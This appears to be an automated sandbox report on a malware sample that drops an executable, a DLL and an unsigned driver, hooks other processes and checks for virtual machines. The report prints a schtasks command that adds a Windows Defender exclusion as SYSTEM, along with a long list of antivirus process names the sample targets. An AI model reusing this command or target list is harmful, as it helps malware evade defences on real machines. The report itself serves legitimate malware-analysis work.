Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: etoken.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: schannel.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\J8daaU.exe	Section loaded: ncryptsslp.dll

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: Gokod.763652.06.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Gokod.763652.06.exe

Static file information: File size 31995126 > 1048576

Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Gokod.763652.06.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Gokod.763652.06.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\CodeBases\isdev\redist\language independent\x64\SetupSuite64.pdb source: Gokod.763652.06.exe
Source:	Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: J8daaU.exe, 00000008.00000002.1541949190.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000008.00000000.1527093516.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000009.00000000.1637253845.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000000.2227008485.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000002.2417861079.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: Gokod.763652.06.exe
Source:	Binary string: F:\4.7.471.07\Sources\_bin\32\Release\PhilipsSpeechDriverConfiguration.pdb source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: Gokod.763652.06.exe
Source:	Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: Gokod.763652.06.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: Gokod.763652.06.exe
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: Gokod.763652.06.exe

Source: Gokod.763652.06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Gokod.763652.06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Gokod.763652.06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Gokod.763652.06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Gokod.763652.06.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAE190C GetCurrentProcessId,ProcessIdToSessionId,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetFileAttributesW,GetLastError,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FreeLibrary,

8_2_00007FF6FCAE190C

Source: initial sample

Static PE information: section where entry point is pointing to: .{,3

Source: J8daaU.exe.0.dr	Static PE information: section name: _RDATA
Source: eToken.dll.0.dr	Static PE information: section name: .QO
Source: eToken.dll.0.dr	Static PE information: section name: .h1c
Source: eToken.dll.0.dr	Static PE information: section name: .{,3

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\Gokod.763652.06.exe	File created: C:\Users\user\Documents\eToken.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	File created: C:\Users\user\Documents\J8daaU.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\Gokod.763652.06.exe	File created: C:\Windows\Temp\aceprocted.sys	Jump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	File created: C:\Users\user\Documents\eToken.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	File created: C:\Users\user\Documents\J8daaU.exe	Jump to dropped file
Source: C:\Users\user\Documents\J8daaU.exe	File created: C:\Program Files (x86)\u0syUl\u0syUl.exe	Jump to dropped file
Source: C:\Users\user\Documents\J8daaU.exe	File created: C:\Program Files (x86)\4xCNoe\4xCNoe.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Gokod.763652.06.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 6360 base: 7FFCC3890008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 6360 base: 7FFCC372D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 6360 base: 7FFCC38A0005 value: E9 EB D9 E8 FF	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 6360 base: 7FFCC372D9F0 value: E9 1A 26 17 00	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 7992 base: 7FFCC3890008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 7992 base: 7FFCC372D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 7992 base: 7FFCC38A0005 value: E9 EB D9 E8 FF	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 7992 base: 7FFCC372D9F0 value: E9 1A 26 17 00	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 4056 base: 7FFCC3890008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 4056 base: 7FFCC372D9F0 value: E9 20 26 16 00
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 4056 base: 7FFCC38A0005 value: E9 EB D9 E8 FF
Source: C:\Users\user\Documents\J8daaU.exe	Memory written: PID: 4056 base: 7FFCC372D9F0 value: E9 1A 26 17 00

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 8_2_00007FF6FCAE1000 GetCurrentThreadId,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentThreadId,Sleep,

8_2_00007FF6FCAE1000

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: GETDATAC:\USERS\TTRUESPANL.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXE360TRAY.EXEZHUDONGFANGYU.EXELIVEUPDATE360.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXESRAGENT.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXEKANKAN.EXESUPERKILLER.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKAVSERVICE.EXEBKAVSYSTEMSERVER.EXEBKAVSYSTEMSERVICE.EXEBKAVSYSTEMSERVICE64.EXEBKAVUTIL.EXEBLUPRO.EXEBLUPROSERVICE.EXECEFUTIL.EXEPOPWNDLOG.EXEPROMOUTIL.EXEQHACTIVEDEFENSE.EXEQHSAFEMAIN.EXEQHS
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Gokod.763652.06.exe	RDTSC instruction interceptor: First address: 1400011AD second address: 1400011C4 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	RDTSC instruction interceptor: First address: 1400011C4 second address: 1400011C4 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F6FE50F5C20h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Gokod.763652.06.exe	RDTSC instruction interceptor: First address: 1FA600 second address: 1FA600 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 mov ecx, dword ptr [esp+24h] 0x0000000d add ecx, eax 0x0000000f mov eax, ecx 0x00000011 mov dword ptr [esp+24h], eax 0x00000015 jmp 00007F6FE47641F7h 0x00000017 mov eax, dword ptr [esp+20h] 0x0000001b inc eax 0x0000001d mov dword ptr [esp+20h], eax 0x00000021 cmp dword ptr [esp+20h], 000003E8h 0x00000029 jnl 00007F6FE4764239h 0x0000002b rdtsc
Source: C:\Users\user\Documents\J8daaU.exe	RDTSC instruction interceptor: First address: 1F5A6301E95 second address: 1F5A6301EA3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\J8daaU.exe	RDTSC instruction interceptor: First address: 2B87364A685 second address: 2B87364A693 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Windows\System32\svchost.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 55_2_000002B87364A685 rdtsc

55_2_000002B87364A685

